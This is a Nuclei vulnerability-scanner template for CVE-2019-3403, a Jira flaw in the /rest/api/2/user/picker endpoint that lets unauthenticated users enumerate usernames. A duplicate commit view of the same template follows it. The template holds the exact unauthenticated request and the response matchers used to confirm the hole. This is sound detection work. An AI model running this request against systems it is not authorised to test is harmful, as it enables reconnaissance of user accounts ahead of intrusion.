nuclei-templates/cves/2019/CVE-2019-3403.yaml

id: CVE-2019-3403

info:
  name: User enumeration via an incorrect authorisation check
  author: Ganofins
  severity: medium
  description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
  reference: https://nvd.nist.gov/vuln/detail/CVE-2019-3403
  tags: cve,cve2019,atlassian,jira

requests:
  - method: GET
    path:
      - "{{BaseURL}}/rest/api/2/user/picker?query="

    matchers-condition: and
    matchers:

      - type: status
        status:
          - 200

      - type: word
        words:
          - 'application/json'
        part: header

      - type: word
        words:
          - users
          - total
          - header
        condition: and
Create CVE-2019-3403.yaml (#873) 2021-02-16 16:55:16 +00:00			`id: CVE-2019-3403`

			`info:`
			`name: User enumeration via an incorrect authorisation check`
			`author: Ganofins`
			`severity: medium`
			`description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.`
			`reference: https://nvd.nist.gov/vuln/detail/CVE-2019-3403`
			`tags: cve,cve2019,atlassian,jira`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/rest/api/2/user/picker?query="`

			`matchers-condition: and`
			`matchers:`

			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`words:`
			`- 'application/json'`
			`part: header`

			`- type: word`
			`words:`
			`- users`
			`- total`
			`- header`
			`condition: and`